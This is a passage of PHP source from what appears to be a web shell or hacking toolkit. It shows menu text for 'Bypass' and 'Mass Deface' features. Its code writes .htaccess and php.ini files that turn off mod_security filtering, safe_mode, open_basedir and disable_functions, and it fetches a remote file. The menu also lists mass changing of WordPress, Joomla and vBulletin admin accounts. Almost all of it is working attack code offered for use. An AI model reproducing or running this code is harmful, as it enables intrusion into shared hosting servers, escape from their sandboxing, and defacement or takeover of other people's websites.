@file_get_contents($mauritania);$zzz = fwrite($xopen
,$rim);if($zzz){echo "ini.php Has Been Downloaded \!/";} else {echo
"Can't Download ini.php :( do it manually :D ";}fclose($xopen);$ini
= fopen("ghost/php.ini" ,"w");$php = fwrite($ini,
base64_decode($phpini));if($php){echo "PHP.INI Generated
Successfully \!/";} else {echo "[-] Can't Generate PHP.INI";}}echo
"";}if(isset($_GET['action']) && $_GET['action'] ==
'setphr'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass
Perl Security -Bypass With Zip File -Bypass system function -Bypass
With exec Function -Bypass With shell_exec -Bypass posix_getpwuid
-Bypass PHP Suhosin function blacklist -Bypass Functions
suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read
Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass
SafeMode 2014 Priv8 ';echo '
Bypass suPHP Security
';echo '
'; error_reporting(0);
if(isset($_POST['gnr'])){mkdir('suPHP',0755);$rr = "
SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding
Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding
Off SecFilterNormalizeCookies Off order deny,allow deny from all
allow from all order deny,allow deny from all suPHP_ConfigPath
".getcwd()."/php.ini";$g =
fopen('suPHP/.htaccess','w');fwrite($g,$rr);echo "
.htaccess Has Been Generated Successfully
";echo "
Click here
";}echo '
';error_reporting(0);
if(isset($_POST['gnrp'])){mkdir('suPHP',0755);$rr = "safe_mode =
OFFSafe_mode_gid = OFFdisable_functions = NONEdisable_classes =
NONEopen_basedir = OFFsuhosin.executor.func.blacklist = NONE";$g =
fopen('suPHP/php.ini','w');fwrite($g,$rr);echo "
php.ini Has Been Generated Successfully
";echo "
Click here
";}}if(isset($_GET['action']) && $_GET['action'] ==
'suppet'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass
Perl Security -Bypass With Zip File -Bypass system function -Bypass
With exec Function -Bypass With shell_exec -Bypass posix_getpwuid
-Bypass PHP Suhosin function blacklist -Bypass Functions
suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read
Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass
SafeMode 2014 Priv8 ';echo '
Bypass Functions suPHP_ConfigPath Security
';echo '
'; error_reporting(0);
if(isset($_POST['gnr'])){mkdir('suPHP2',0755);$rr = "
SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding
Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding
Off SecFilterNormalizeCookies Off order deny,allow deny from all
allow from all order deny,allow deny from all suPHP_ConfigPath
".getcwd()."/php.ini";$g =
fopen('suPHP2/.htaccess','w');fwrite($g,$rr);echo "
.htaccess Has Been Generated Successfully
";echo "
Click here
";}echo '
';error_reporting(0);
if(isset($_POST['gnrp'])){mkdir('suPHP2',0755);$rr = "safe_mode =
Offdisable_functions = NONEsafe_mode_gid = OFFopen_basedir =
OFF";$g = fopen('suPHP2/php.ini','w');fwrite($g,$rr);echo "
php.ini Has Been Generated Successfully
";echo "
Click here
";}}if(isset($_GET['action']) && $_GET['action'] ==
'mass'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass
Change Admin vBulletin -Mass Change Admin WordPress -Wordpress
& Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla
Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto
Defacer ';if(!isset($_GET['code'])){?>